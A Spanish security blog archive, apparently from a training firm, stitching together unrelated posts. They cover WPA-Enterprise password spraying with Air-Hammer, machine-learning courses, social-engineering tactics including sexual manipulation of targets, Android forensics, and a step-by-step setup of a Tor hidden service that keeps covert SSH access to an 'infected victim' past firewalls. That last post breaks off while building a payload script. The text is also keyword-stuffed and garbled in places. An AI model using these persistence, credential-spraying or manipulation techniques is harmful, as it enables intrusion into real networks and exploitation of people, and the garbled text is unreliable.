Pruebas de Penetración

¿CÓMO HACKEAR LA RED WPA EMPRESARIAL CON AIR-HAMMER?

Posted on

Ataques de fuerza bruta en línea contra la red WPA empresarial que parecen ser pasadas por alto, si no desconocidas, en la literatura actual sobre la seguridad de la red inalámbrica y en la comunidad de seguridad o pentesting en general. Aunque la red WPA empresarial a menudo se considera “más seguro” que WPA-PSK, que también tiene una superficie de ataque mucho más grande según expertos de pruebas de penetración. Mientras que las redes WPA-PSK sólo tienen una contraseña válida, puede haber miles de combinaciones de nombre de usuario y una contraseña válida que conceda acceso a una única red WPA empresarial. Acuerdo a reportes de pentesting, las contraseñas utilizadas para acceder a red WPA empresarial están comúnmente seleccionadas por los usuarios finales, muchos de los cuales seleccionan contraseñas extremadamente comunes.

air-hammer

CÓMO FUNCIONA EL AIR HAMMER

Air Hammer requiere como mínimo los siguientes parámetros para un hacer ataque:

  • La interfaz inalámbrica para ser utilizada
  • El nombre de la red (SSID) de la red inalámbrica esté a la que está destinada durante pruebas de penetración.
  • Una lista de nombres de usuario objetivo
  • Una contraseña o una lista de contraseñas para ser analizados para cada nombre de usuario

Air Hammer entonces intenta la autenticación en la red objetivo al tratar la contraseña proporcionada con cada nombre de usuario en la lista. Si se proporciona más de una contraseña, cada nombre de usuario es intentado con la primera contraseña antes de pasar a la siguiente contraseña.

Los expertos de pentesting han creado Air Hammer y dicen que interactuar con los nombres de usuario en lugar de las contraseñas es ventajoso porque:

  1. Hay una probabilidad mucho más alta que podamos adivinar la contraseña de al menos uno, de entre todos los usuarios de la organización que la probabilidad de que podemos adivinar la contraseña de un usuario único, específico en la organización.
  2. Debido a la cuenta de políticas de bloqueo comúnmente en su lugar, es posible hacer muchas veces más intentos de conexión dentro de un plazo determinado mediante la difusión de ellas a través de múltiples cuentas de usuario.

Después se descubrió un conjunto válido de credenciales, el nombre de usuario y la contraseña se muestran en la pantalla. En función de los parámetros utilizados, las credenciales opcionalmente se pueden guardar en un archivo de salida, y el ataque puede ser terminado en el primer éxito o permitido que continúe.

CADENA DE ATAQUE TÍPICO DURANTE PENTESTING

La cadena de ataque típico durante pentesting para los ataques realizados con Aire-Hammer es la siguiente:

Identificar la red de destino y el mecanismo de autenticación en uso. La versión actual del Air Hammer sólo es compatible con PEAP / MSCHAPv2. Los investigadores de pruebas de penetración añadirán los mecanismos de autenticación adicionales en versiones futuras.

Generar una lista de nombres de usuario para su uso en el ataque. Identificar el formato de nombre de usuario utilizado por la organización. Las fuentes posibles incluyen:

  • Los nombres de usuarios almacenados dentro de los metadatos de los archivos disponibles en el sitio web de la empresa.
  • La primera mitad de direcciones de correo electrónico corporativo. (La parte antes de la “@”).
  • Los nombres de usuario capturados durante un ataque “Evil Twin” de la red destino.
  • Hacer una lista de los nombres y apellidos de los mayoria de los empleados de la organización como sea posible. Las fuentes posibles: 1. El sitio web empresarial 3. Data.com 3. LinkedIn
  • El uso de la información obtenida de los pasos anteriores durante pentesting, generara una lista de nombres de usuarios potenciales.

Uso de Air-Hammer para descubrir las credenciales válidas.

Uso de credenciales descubierto para acceder a la red inalámbrica.

Muchas empresas de pentesting usan herramientas como de Air Hammer para hacer pruebas de penetración. Los expertos de pentesting de IICS International Institute of Cyber Security mencionan que desde credenciales la empresa WPA que son a menudo de dominio de las credenciales del usuario, utilice las credenciales descubiertas para acceder a sistemas adicionales en la red interna e iniciar ataques adicionales.

air-hammer2-1

https://github.com/Wh1t3Rh1n0/air-hammer/

 

 

¿CÓMO APRENDER LENGUAJE DE MÁQUINA PARA SER UN HACKER AVANZADO?

Posted on

Con ayuda de los expertos de ethical hacking, la siguiente es una lista de los cursos gratuitos de lenguaje de máquina para principiantes en el área de programación.

1. MACHINE LEARNING

Machine-learning-1

En primer lugar, podría decirse que el curso más popular en esta lista, Machine Learning ofrece una amplia introducción al aprendizaje automático, minería de datos, y el reconocimiento de patrones estadísticos según profesores de curso de ethical hacking de iicybersecurity IICS.

Los temas incluyen:

  • Aprendizaje supervisado (parametric/non-parametric algorithms, support vector machines, kernels, neural networks).
  • El aprendizaje no supervisado (clustering, dimensionality reduction, recommender systems, deep learning).
  • Las mejores prácticas en el lenguaje de máquina y recomendaciones de los expertos de pruebas de penetración.

El curso también se basará en numerosos estudios de casos y aplicaciones, de modo que usted también aprenderá cómo aplicar algoritmos de aprendizaje para la construcción de robots inteligentes, comprensión del texto (búsqueda en la Web, anti-spam), la visión de computadora, la informática médica, audio, extracción de bases de datos, ethical hacking, pruebas de penetracióny otras áreas.

2. MACHINE LEARNING FOUNDATIONS: A CASE STUDY APPROACH

Machine-learning-2

En Machine Learning Foundations: A Case Study Approach, obtendrás experiencia práctica con el lenguaje de máquina a partir de una serie de estudios de casos prácticos. A través de ejercicios prácticos con estos casos de uso, usted será capaz de aplicar los métodos de lenguaje de máquina en una amplia gama de dominios acuerdo a consultores de pruebas de penetración.

Para el final de este curso, usted será capaz de:

  • Identificar las posibles aplicaciones de lenguaje de máquina en la práctica.
  • Describir las diferencias fundamentales en los análisis habilitados por regresión, clasificación y agrupamiento.
  • Seleccionar la tarea de lenguaje de máquina apropiada para una aplicación potencial.
  • Aplicar regression, classification, clustering, retrieval, recommender systems y deep learning a ethical hacking y pruebas de penetración.
  • Representar los datos como características para servir como entrada para modelos de lenguaje de máquina.
  • Utilizar un conjunto de datos para ajustar un modelo de análisis los nuevos datos.
  • Construir una aplicación de extremo a extremo que utilice la lenguaje de máquina en su núcleo que podrías usar durante práctica de ethical hacking.
  • Poner en práctica estas técnicas en Python.

3. LEARNING FROM DATA

Machine-learning-3

 

Learning From Data es un curso introductorio de lenguaje de máquina que cubrirá la teoría básica, algoritmos y aplicaciones.

Se equilibra la teoría y la práctica, y cubre las matemáticas, así como los aspectos heurísticos. Las clases teóricas se suceden de una manera similar a la historia acuerda a los profesores de curso de ethical hacking de international institute of cyber secrity:

  • ¿Qué es el aprendizaje?
  • ¿Puede una máquina aprender?
  • ¿Cómo hacerlo?
  • ¿Cómo hacerlo bien?
  • Lecciones para llevar a casa.

Usted aprenderá a:

  • Identificar los principios básicos teóricos, algoritmos y aplicaciones del aprendizaje automático
  • Elaborar  las conexiones entre la teoría y la práctica en lenguaje de máquina.
  • Dominar los aspectos matemáticos y heurísticos de lenguaje de máquina y sus aplicaciones a situaciones del mundo real para hacer programas de ethical hacking, pruebas de penetración.

4. MACHINE LEARNING: CLASSIFICATION

Machine-learning-4

En Machine Learning: Classification, va a crear clasificadores que proporcionan un rendimiento del estado técnico en una variedad de tareas. Usted se familiarizará con las técnicas más exitosas, que son los más ampliamente utilizadas en la práctica en el ámbito de ethical hacking y pruebas de penetración. Este curso es práctico, lleno de acción, y lleno de visualizaciones y ejemplos de cómo estas técnicas se comportarán en datos reales.

Para el final de este curso, usted será capaz de:

  • Describir la entrada y salida de un modelo de clasificación
  • Hacer frente a ambos problemas de clasificación binaria y multiclase
  • Implementar un modelo de regresión logística para la clasificación a gran escala
  • Mejorar el rendimiento de cualquier modelo utilizando boosting
  • Escala sus métodos con stochastic gradient ascent
  • Describir los límites de decisión que subyacen
  • Analizar los datos financieros para predecir créditos incobrables
  • Utilizar técnicas para el manejo de los datos faltantes para hacer pruebas de penetración
  • Evaluar sus modelos usando las métricas de precision-recall
  • Poner en práctica estas técnicas en

5. MACHINE LEARNING: CLUSTERING & RETRIEVAL

Machine-learning-5

En Machine Learning: Clustering & Retrieval va a examinar algoritmos basados en la similitud para la recuperación.

Según curso de ethical hacking, para el final de este curso, usted será capaz de:

  • Crear un sistema de recuperación de documentos
  • Identificar las diferentes medidas de similitud para los datos de texto
  • Comparar y contrastar supervisado, y tareas de aprendizaje sin supervisión
  • Documentos de Cluster por tema utilizando k-means
  • Examinar probabilistic clustering usando modelos de mezclas
  • Describir los pasos de un muestreado de Gibbs y cómo utilizar su salida para sacar conclusiones
  • Poner en práctica estas técnicas en Python

6. MACHINE LEARNING FOR DATA SCIENCE AND ANALYTICS

Machine-learning-6

Machine Learningfor Data Science and Analytics es una introducción a los algoritmos de lenguaje de máquina. Va a desarrollar una comprensión básica de los principios del lenguaje de máquina y obtener soluciones prácticas utilizando el análisis predictivo. También examinamos las razones de porque los algoritmos juegan un papel esencial en el análisis de Big Data y pruebas de penetración avanzados.

En este curso, usted aprenderá:

  • ¿Qué es lenguaje de máquina y cómo se relaciona con las estadísticas y análisis de datos?
  • ¿Cómo se usa el lenguaje de máquina con algoritmos informáticos para buscar patrones en los datos durante ethical hacking?
  • ¿Cómo utilizar los patrones de datos para tomar decisiones y predicciones con ejemplos del mundo real?
  • ¿Cómo descubrir temas ocultos en grandes colecciones de documentos utilizando el modelado tema?
  • Modo de preparación de datos, hacer frente a los datos faltantes y crear datos personalizados, soluciones de análisis para diferentes industrias y soluciones de pruebas de penetración.
  • Las básicas y frecuente usadas técnicas algorítmicas que incluyen la clasificación, búsqueda, algoritmos codiciosos y programación dinámica

 

DIVERSAS METODOLOGÍAS Y TIPOS DE ATAQUES DE INGENIERÍA SOCIAL

Posted on Updated on

La ingeniería social es el término que se utiliza para la explotación de las debilidades de la conducta humana para tener acceso a una organización o sistema, o invadir el espacio físico o virtual de una organización.

Según experiencia de expertos de pruebas de penetración de International Institute of Cyber Security, los ingenieros sociales utilizan una amplia variedad de métodos para obtener acceso a información confidencial o reservada, y el ingenio de los atacantes maliciosos significa que siempre se inventan nuevos métodos y nuevas formas de empleo para romper la seguridad lógica y seguridad perimetral.

CqMx7tVUsAM1bO7

Aquí presentamos algunos de los métodos más comunes utilizados por los ingenieros sociales.

1. OBTENCIÓN DE INFORMACIÓN

Los ingenieros sociales inician mediante la búsqueda de la información que puede ser utilizada para penetrar en un sistema o una organización. Se utilizan varios métodos de confianza que animan a la gente a compartir información, y cuanto más se sabe acerca de un individuo o una organización, más fácil es para ellos para atacar la seguridad lógica y seguridad perimetral.

Según experiencia de expertos de pruebas de penetración de iicybersecurity IICS, algunos métodos de baja tecnología que los ingenieros sociales pueden utilizar para atacar la seguridad lógica y seguridad perimetral son:

  • El arrastre de objetos valiosos en estacionamientos. Los Coches pueden contener tarjetas de seguridad, teléfonos inteligentes, las carpetas, documentos confidenciales u otros artículos de gran valor para un ingeniero social.
  • Los sitios de medios sociales como Facebook, Linked In, y Google + son ricas fuentes de información sobre los individuos y organizaciones.
  • Un buen ingeniero social encontrara una oportunidad de mirar a través de la basura un verdadero tesoro de información descartada, pero útil.
  • Creación de un pretexto (también llamado “pretexting”) es la técnica de inventar un escenario plausible como olvidar la propia tarjeta de identificación o tener problemas informáticos que incitan a la víctima a permitir voluntariamente al ingeniero social tener acceso a su ordenador o al sistema y romper la seguridad lógica y seguridad perimetral .
  • Un ingeniero social pasa el tiempo averiguando donde el objetivo pasa el tiempo, dónde compra, a que los clubes pertenece, a qué actividades se dedica.

2. CÓMO FAMILIARIZARSE CON GENTE

Como hemos señalado anteriormente, el objetivo de un ataque de ingeniería social es obtener información para pasar la seguridad lógica y seguridad perimetral, por lo general con el fin de ejecutar una técnica más profunda en una organización. El método para lograr esto es establecer una confianza inapropiada. Como siempre, los ingenieros sociales tienen una gran cantidad de métodos para lograr esto.

El ingeniero social puede frecuentar un bar que es muy popular entre los empleados o un club o un restaurante que es un favorito de los ejecutivos de la empresa objetivo, saludando y conversando con la gente hasta que él o ella llega a ser reconocido e incluso es saludado con una sonrisa.

Otra técnica que se utiliza para establecer la familiaridad, es que el ingeniero social puede elegir un grupo de personas para entrar en el edificio con de forma periódica, ya sea continua hasta el fondo o desviarse en el último minuto. En cualquier caso, el impostor se las arregla para ser una cara conocida en el grupo explica experto de pruebas de penetración.

Los ingenieros sociales también utilizarán las redes sociales para reforzar su familiaridad, su interés en ser un amigo o conexión, y siguiendo a la gente para establecer su presencia.

3. PIGGYBACKING

Una forma en que los ingenieros sociales utilizan su familiaridad cuidadosamente. Piggybacking es una de las más antiguas tácticas de infiltración en la historia, mucho más antigua que la propia era de la información.

A veces, la táctica se utiliza para seguir a otro empleado en una zona de acceso restringido: el ingeniero social se correrá después de un empleado de entrar en la sala de servidores.

En otro tipo de ataque piggybacking, el ingeniero social pretenderá ser una persona de la entrega, incluso a aparecer en uniforme. Él o ella se acercarán a la puerta justo detrás de otros empleados, cargado con un paquete, y solicitará a alguien para mantener la puerta “piggybacking” en el acceso legítimo de otra persona y pasar la seguridad lógica y seguridad perimetral.

4. GANAR LA CONFIANZA CON EL LENGUAJE CORPORAL

Los ingenieros sociales son expertos en su campo y están bien educados en la lectura del lenguaje corporal y en la proyección de mensajes utilizando el lenguaje corporal explican los expertos de pruebas de penetración.

Inhalando al mismo ritmo que el blanco, sonriendo íntimamente y de manera apropiada, reaccionando y respondiendo a los cambios emocionales, estas son sólo una muestra de las señales psicológicas sutiles un ingeniero social puede utilizar para hacer una conexión con un empleado para pasar la seguridad lógica y seguridad perimetral.

Mediante la creación de confianza a un nivel inconsciente, la gente por defecto a desea de ayudar a sostener la puerta para que el impostor puede entrar en la empresa, ayudando a pegar su ordenador a la red, y así sucesivamente. El ingeniero social, en este caso, crea una atmósfera donde la asistencia es automática, y el objetivo responde sin pensar.

5. GANAR LA CONFIANZA CON EL SEXO

Tan obvio como es, los individuos seleccionados caen en la trampa cada vez: Sexo. Un ingeniero social puede ganar la confianza al mostrarse atractivo para un individuo en la sociedad, e incluso salir con la persona y el desarrollo de una relación íntima. A veces, un coqueteo hará el truco, y el objetivo será proporcionar la información sin problemas de seguridad perimetral.

Pero si el coqueteo por sí solo no es suficiente para ganar la confianza suficiente de la víctima, un ingeniero social dedicado escalará la relación, pidiendo a la victima por una cita, lo garantizando que la cita salga bien y el seguimiento con más citas, más tiempo juntos, más confianza para pasar la seguridad lógica y seguridad perimetral.

6. EL USO DE HOSTILIDAD

Una alternativa al establecimiento de la confianza y romper la seguridad perimetral es establecer la hostilidad en contra de la intuición y hostilidad es otra forma de intimidad.

La hostilidad genera la intimidad o confiar en esta forma: la gente en general, prefiere evitar a las personas hostiles. Si alguien suena o parece enojado, la reacción instintiva es permanecer fuera de su camino y evitar que enfureciera aún más – tal vez la apertura de puertas, dirigirlos a áreas sensibles, o la oferta de simpatía en un esfuerzo por evitar o mitigar la ira.

Una manera en que los ingenieros sociales utilizan este aspecto de la conducta humana es mediante la unión con sus objetivos sobre la causa de su enojo. ¿Quién no va a ofrecer simpatía después de una mala sesión con uno de la compañía de seguros? Al compartir frustraciones, un ingeniero social puede fomentar un sentido de camaradería con un objetivo desprevenido mencionan los expertos de pruebas de penetración.

Otra forma que los ingenieros sociales pueden utilizar una situación hostil es si tienen que ir a través de las zonas sensibles en las instalaciones físicas de una organización y pasar la seguridad perimetral.

7. OBTENER UNA ENTREVISTA Y UN TRABAJO

Objetivos de hackers – es decir, las organizaciones con una gran cantidad de datos valiosos – valen una mayor inversión de tiempo y energía, incluso hasta el punto de invertir meses o años en la infiltración de una empresa. Un ingeniero social con una agenda ambiciosa podría tener éxito en conseguir un puesto de trabajo, aunque la entrevista por sí solo puede proporcionar suficiente información para proceder al siguiente nivel de ataque para hackear la seguridad perimetral y seguridad lógica.

Una sorprendente cantidad de información confidencial o sensible puede ser intercambiada durante una entrevista, en particular uno con un candidato prometedor. Los ingenieros sociales son expertos en hacer las preguntas correctas tal vez acerca de la tecnología de TI en funcionamiento, y los detalles de un proceso de negocio.

Se establece un nivel de comodidad y familiaridad. El candidato puede incluso manejar la situación para conseguir que el entrevistador inicie sesión en el sistema allí mismo, obteniendo toda la información que necesitan de la entrevista a solas, y nunca tener que mostrarse para un día de “trabajo”.

Sin embargo, el entrevistador no puede ser llevado tan fácilmente, en cuyo caso, si la organización de destino es lo suficientemente valiosa, el ingeniero social podría tener éxito en la infiltración de la empresa desde dentro, por conseguir un empleo y la obtención de las credenciales oficiales según experiencia de los consultores de pruebas de penetración.

8. ACTUANDO COMO UN CONSULTOR

Un ingeniero social puede en cambio optar por ingresar a la compañía como consultor. Los consultores son a menudo confiados con una enorme cantidad de información confidencial de seguridad perimetral, seguridad lógica después de que hayan firmado sus acuerdos de no divulgación. Los asesores deben ser cuidadosamente examinados, y las referencias obtenidas y confirmadas antes de contratarlos, los niveles de confianza se deben aumentar lentamente.

9. HABLAR DE LA CHARLA

Una de las tácticas de gran alcance en la caja de herramientas de los ingenieros sociales es el conocimiento mencionan los expertos de pruebas de penetración. Un ingeniero social experto puede usar esas habilidades para conseguir una entrevista o incluso un puesto de trabajo, pero él o ella puede crear confianza simplemente por estar bien informado. Las personas sin conocimientos técnicos pueden ser fácilmente superadas por las personas que tienen derecho a las palabras de moda y jergas de la industria, ya que a menudo proporcionan voluntariamente contraseñas, acceso a sistemas de seguridad lógica a una persona que simplemente suena bien informado y seguro de sí mismo.

10. INGENIERÍA SOCIAL INVERSA

Por último, existe la táctica conocida como ingeniería social inversa (RSE), en la que el ingeniero social crea un problema y, a continuación interviene para resolverlo. Esta táctica tiene tres pasos básicos: el sabotaje inicial, que ofrecen asistencia e infiltración.

En primer lugar, un ingeniero social utiliza una jugada para alertar departamento de TI que están bajo ataque. Esto puede ser un ataque de denegación de servicio en su página web, o tal vez es tan simple como enviar un correo electrónico de phishing. El objetivo es asegurar que ellos conocen que están bajo ataque y que la seguridad perimetral, seguridad lógica puede verse comprometida.

 

A continuación, el ingeniero social aparece como un consultor de seguridad perimetral, seguridad lógica o agencia. Con una gran cantidad de conocimientos sobre el problema, ya que ellos ayudaron a causarlo demuestran su experiencia y su capacidad para solucionar el problema y ofrecer ayuda. Por último, después de haber sido contratado para solucionar el problema que han causado, los atacantes son capaces de ejecutar la actividad maliciosa, al igual que la posibilidad de subir malware o el robo de datos confidenciales.

La primera línea de defensa contra los ataques de ingeniería social es un buen programa de educación para sus empleados y tener seguridad perimetral, seguridad lógica pero no puede terminar ahí. Con el fin de fomentar una cultura de comportamiento defensivo, las organizaciones puede configurar pruebas de penetración sin previo aviso a los empleados, utilizando técnicas de ingeniería social inesperadas en momentos aleatorios. Según expertos de International Institute of Cyber Security iicybersecurity, Si los empleados están condicionados a pensar y actuar de forma segura, es más probable que lo hagan cuando se enfrentan a una amenaza real.

¿CÓMO EXTRAER DATOS FORENSES DEL DISPOSITIVO MÓVIL DE ANDROID?

Posted on Updated on

En este artículo, vamos a hablar de la utilización de los programas que se utilizan en el día a día en la informática forense y la exanimación para el análisis de los dispositivos móviles que ejecutan el sistema operativo Android con ayuda de expertos de pruebas de penetración.

INTRODUCCIÓN

La mayoría de los dispositivos móviles en el mundo ejecutan el sistema operativo Android. Durante la exanimación de los dispositivos móviles que ejecutan el sistema operativo Android (en adelante, dispositivos móviles) expertos de informática forense se enfrentan a las siguientes dificultades:

  1. No hay un programa de informática forense que soporte la extracción de datos de todos los dispositivos móviles existentes en el mundo.
  2. Hay un gran número de programas diseñados para el sistema operativo Android, en los cuales los datos podrían ser potencialmente interesantes para los investigadores de pruebas de penetración. Hasta el momento, no existe un programa de apoyo de análisis forense de los registros y los datos de todos esos programas.
  3. El tiempo, cuando los investigadores estaban interesados en los datos de una libreta de teléfonos, llamadas, mensajes SMS que fueron extraídos por el experto de pruebas de penetración, ha pasado. Ahora también están interesados en la historia de los recursos de la red (datos de navegadores), la historia de los programas de intercambio de mensajes cortos, los archivos eliminados (archivos gráficos, vídeos, bases de datos SQLite, etc.) y otra información criminalística valiosa acuerdo una encuesta de empresas de pruebas de penetración.
  4. Los delincuentes a menudo eliminan los archivos de la memoria de sus dispositivos móviles, tratando de ocultar información sobre el crimen cometido.
  5. Los laboratorios de informática forense y subdivisiones de pruebas de penetración que examinan no pueden permitirse el lujo de comprar paquetes de software especializado, debido al alto costo.

 CntTpXgUkAABCRN

SOLUCIÓN PARA ESTO

EXTRACCIÓN DE DATOS FÍSICOS DE LOS DISPOSITIVOS MÓVILES

Teniendo en cuenta el hecho de que los investigadores también están interesados en los archivos borrados que se encuentran en la memoria de los dispositivos móviles, los expertos de informática forense tienen que hacer la extracción de datos físicos de la memoria del dispositivo móvil. Eso significa que los expertos de análisis forense tienen que obtener una copia completa del dispositivo examinado. Un experto de análisis forense puede hacer un volcado de memoria física utilizando los métodos siguientes:

  1. Extracción de los datos directamente de los chips de memoria del dispositivo móvil utilizando el método de Chip-off. Según empresa de pruebas de penetración, este método más difícil de extracción de datos, pero a veces es la única manera de extraer los datos desde el dispositivo.
  2. La extracción de datos desde la memoria del dispositivo móvil utilizando la interfaz JTAG de depuración. Este método permite extraer datos de los dispositivos que tengan insignificantes daños en hardware y software.
  3. Extracción de los datos de a través de programas especializados (por ejemplo,Oxygen Forensic Suit) y complejos hardware-software (.XRY (Micro Systemation), UFED (CellebriteForensics), Secure View 3.
  4. Creación de copia de la memoria del dispositivo móvil manualmente.

Métodos combinados según expertos de informática forense y pruebas de penetración.

EXTRACCIÓN DE DATOS LÓGICOS

2.1. Ganando un acceso a los datos que se encuentran en copia de una memoria del dispositivo móvil

No importa qué método los expertos análisis forense utilicen para obtener la copia de memoria del dispositivo móvil, al final un experto de análisis forense va a recibir un archivo (o varios archivos), los cuales tienen que ser examinados de alguna manera y lo que necesita es extraer los datos necesarios.

En este caso, la tarea del experto de análisis forense es la extracción solamente de datos lógicos que se encuentran en la copia de la memoria de un dispositivo móvil que ejecuta el sistema operativo Android, se puede montar una imagen recibida en FTK Imager o UFS Explorer. Según expertos de pruebas de penetración, copias de memoria de los dispositivos móviles que ejecutan el sistema operativo Android por lo general contienen un gran número de particiones lógicas. Los datos del usuario de dispositivos móviles están en la partición lógica, que se nombra USERDATA. De esta partición, puedes extraer datos tales como bases de datos, vídeos, archivos gráficos, archivos de audio, etc.

Forense Android

LA DESCODIFICACIÓN DE LA BASE DE DATOS SQLIT

Como regla general, bases de datos SQLite extraídas de la memoria de copia del dispositivo móvil son de sumo interés para los expertos de análisis forense. En primer lugar, está conectado con el hecho de que la información criminalística valiosa se almacena en este formato. Según expertos de pruebas de penetración, en bases de datos SQLite se almacenan los datos siguientes: una agenda de teléfonos, llamadas, mensajes SMS, mensajes MMS, diccionarios, los datos de los dispositivos móviles de los navegadores web, registros de sistema del dispositivo móvil y etc.

Tipo de data Nombre del archivo
1 Phone book \data\data\com.android.providers.contacts\ databases\contacts2.db
2 SMS, MMS messages \data\data\com.android.providers.telephony\ databases\mmssms.db
3 Calendar \data\com.android.providers.calendar\databases\ calendar.db
4 Log \data\com.sec.android.provider.logsprovider\ databases\logs.db
5 User’s data \data\system\users\accounts.db
6 Web-browser history \data\data\com.android.browser\databases\ browser2.db
7 Dictionary \data\user\comc.android.providers.userdictionary\ databases\user_dict.db

Algunos investigadores proponen utilizar dos programas para decodificar los archivos de bases de datos SQLite: DCode v4.02a, SQLite Database Browser 2.0b1. En caso de que nosotros usemos la combinación de estos programas, todavía hay un problema en la recuperación y el análisis de los archivos borrados.

Una de las herramientas que solucionan este problema Oxygen Forensic SQLite Viewer.

RECUPERACIÓN DE DATOS Y ARCHIVOS BORRADOS

La recuperación de los datos y los archivos borrados de los dispositivos móviles es un proceso complicado. No es común, pero la mayor parte de los programas de análisis forense no son compatibles con el sistema de archivos YAFFS2. Por eso el experto de informática forense puede encontrarse a sí mismo en una situación en que su programa no es capaz de recuperar algo de la descarga de memoria del dispositivo móvil durante el examen de copia física de los dispositivos móviles que ejecutan el sistema operativo Android. Como muestra experiencia de análisis forense práctica, es difícil recuperar vídeos borrados y archivos de gran tamaño de esas copias.

UFS Explorer, R-Studio mostró los mejores resultados en la esfera de la recuperación de datos borrados de dispositivos móviles que ejecutan el sistema operativo Android.

Forense Android2

Para la recuperación de datos borrados y los archivos de dispositivos móviles que ejecutan el sistema operativo Android los cuales contienen archivos de YAFFS2, se recomienda utilizar los siguientes programas: Encase Forensic version 7, The Sleuth Kit o Belkasoft Evidence Center.

Forense Android3

ANÁLISIS DE THUMBNAILS BASES

Al igual que en los sistemas operativos Microsoft Windows, en el sistema operativo Android hay archivos que son thumbnails bases y que contienen imágenes en miniatura de los archivos gráficos y de vídeo, creados por el usuario (incluyendo archivos borrados). En el sistema operativo Microsoft Windowss thumbnails bases tiene nombres: Thumbs.DB o thumbcache_xxx.db (donde xxx es el tamaño de la imagen en miniatura en la base). En el sistema operativo Android no hay un nombre unificado de tales bases según expertos de pruebas de penetración . Además, vale la pena señalar que estas bases se pueden encontrar como en el almacenamiento interno al igual que en la tarjeta de memoria instalada en el dispositivo móvil. Para buscar thumbnails bases nosotros utilizamos Thumbnail Expert Forensic. Por regla general, este tipo de archivos permiten recibir información criminalística valiosa, si las principales evidencias son archivos gráficos (fotos) o videos que fueron tomados por el dispositivo móvil examinado.
Forense Android 4

CONCLUSIÓN

La combinación de los programas tradicionales para el análisis de los dispositivos móviles y los programas tradicionales que se utilizan en forense cibernética da los mejores resultados de análisis de copia de los dispositivos móviles que ejecutan el sistema operativo Android.

¿CÓMO USAR TOR PARA LA EVASIÓN DE FIREWALL Y EL ACCESO REMOTO ANÓNIMO?

Posted on

Cuando las direcciones IP que se utilizas para mantener el acceso remoto son bloqueadas o descubiertas, si no estás listo fracasaras y darás vuelta al punto de partida. Dependiendo de qué tan juguetón es  tu adversario, ellos pueden incluso tratar de saber quién es el propietario de esas direcciones IP.

Introduzca Tor – una solución simple. La red Tor se puede aprovechar para mantener el acceso a los servidores comprometidos. Según curso de seguridad en redes, el uso de la red Tor puede ser utilizado para ejecutar los servicios ocultos. Podríamos conectarnos a nuestra victima infectada mediante el procedimiento siguiente:

tor-Deep-web-_

ssh -i /path/to/key -p2222 someuser@ab88t3k7eqe66noe.onion

 

Esta conexión se retransmitirá anónimamente a través de la red Tor, sin pasar por las reglas del firewall, y potencialmente incluso por proxies y la inspección de contenido confirman consultores de pruebas de penetración.

Usando lo anterior con un túnel SSH; podemos hacer todo tipo de cosas grandes.

En una máquina Windows, podría lograrse algo similar mediante la apertura del puerto SMB 445 o puerto RDP 3389 a la red Tor.

¿CÓMO HACERLO?

Vamos a hacer esto en un nuevo Kali 2.0. El primer paso para la compilación de Tor es descargar y extraer la fuente y la instalación de las dependencias requeridas:

Vamos a construir Tor normalmente ejecutando los siguientes  dos comandos en serie:

./configure

make

Ahora vamos a ir a ver el binario Tor que acaba de ser construido por nosotros usando el comando “ldd” “. “Ldd” nos dirá lo que comparten las bibliotecas que se cargan por el binario, para un binario estático no debe haber ninguna.

cd src/or

ldd tor

linux-vdso.so.1 (0x00007ffe02d00000)

libz.so.1 => /lib/x86_64-linux-gnu/libz.so.1 (0x00007fd6982c3000)

libm.so.6 => /lib/x86_64-linux-gnu/libm.so.6 (0x00007fd697fc2000)

libevent-2.0.so.5 => /usr/lib/x86_64-linux-gnu/libevent-2.0.so.5 (0x00007fd697d7a000)

libssl.so.1.0.0 => /usr/lib/x86_64-linux-gnu/libssl.so.1.0.0 (0x00007fd697b1a000)

libcrypto.so.1.0.0 => /usr/lib/x86_64-linux-gnu/libcrypto.so.1.0.0 (0x00007fd69771f000)

libpthread.so.0 => /lib/x86_64-linux-gnu/libpthread.so.0 (0x00007fd697502000)

libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007fd6972fe000)

libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fd696f55000)

/lib64/ld-linux-x86-64.so.2 (0x00007fd6988b7000)

gcc -O2 -static -Wall -fno-strict-aliasing -L/usr/lib/x86_64-linux-gnu/  -o tor tor_main.o ./libtor.a ../common/libor.a ../common/libor-crypto.a ../common/libcurve25519_donna.a ../common/libor-event.a /usr/lib/x86_64-linux-gnu/libz.a -lm /usr/lib/x86_64-linux-gnu/libevent.a -lrt /usr/lib/x86_64-linux-gnu/libssl.a /usr/lib/x86_64-linux-gnu/libcrypto.a  -lpthread -ldl

Si corremos “ldd” contra el nuevo binario:

ldd tor

not a dynamic executable

¡Eso significa que funcionó!

 

CONFIGURACIÓN DE TOR

Tor está configurado en tiempo de ejecución apuntando a un archivo de configuración, normalmente se llama “torrc”. Un ejemplo de archivo torrc se muestra a continuación:

Bridge 176.182.30.145:443 DE54B6962AB7ECBB88E8BC58BEA94B6573267515

Bridge 37.59.47.27:8001 E0671CF9CB593F27CD389CD4DD819BF9448EA834

Bridge 192.36.27.122:55626 35E199EFB98CDC9D3D519EA4F765C021A216F589

UseBridges 1

SocksPort 9050

SocksListenAddress 127.0.0.1

HiddenServiceDir ./.hs/

HiddenServicePort 2222 127.0.0.1:22

Obtuvimos anteriormente “bridges” de bridges.torproject.org. Probablemente deberías obtener tus propios y reemplazarlos. Tenga en cuenta que si hay puertos TCP específicos permitidos saliente en su entorno, debes encontrar un bridge que se ejecute en los puertos explica consultor de pruebas de penetración.

Para ejecutar el servicio oculto para la prueba ejecuta lo siguiente:

./tor -f /path/to/torrc

Un nuevo directorio será creado, llamado “.hs”, en ese directorio habrá un archivo llamado “hostname”. Si nos fijamos en el contenido de este archivo veremos la dirección “.onion” donde se puede acceder a su servicio oculto.

cat ./hs/hostname

ab88t3k7eqe66noe.onion

Suponiendo que el servicio SSH está ejecutando en la máquina, debemos ser capaces de conectarnos a él desde otro ordenador a través de la red Tor de la siguiente manera:

ssh -p2222 user@ab88t3k7eqe66noe.onion

El comando anterior requiere que tengas una máquina conectada a la red Tor que esté encaminando correctamente todo el tráfico TCP a través de Tor. La forma más sencilla de hacer esto según curso de seguridad en redes es ejecutar de un VM que haya configurado previamente esto por ti, como Tails o Whonix.

CREANDO UN PLAYLOAD

Vamos a crear un buen Playload que agrupe todas estas cosas en un bash script.

En primer lugar vamos a copiar el archivo binario de “tor” y nuestro archivo “torrc” a un nuevo directorio:

mkdir ~/payload

cp tor torrc ~/payload

cd ~/payload

Tor requiere que el sistema lo ejecute, para tener un reloj preciso. Según curso de seguridad en redes, una forma de solucionar esto es usar las cabeceras HTTP de sitios web conocidos.

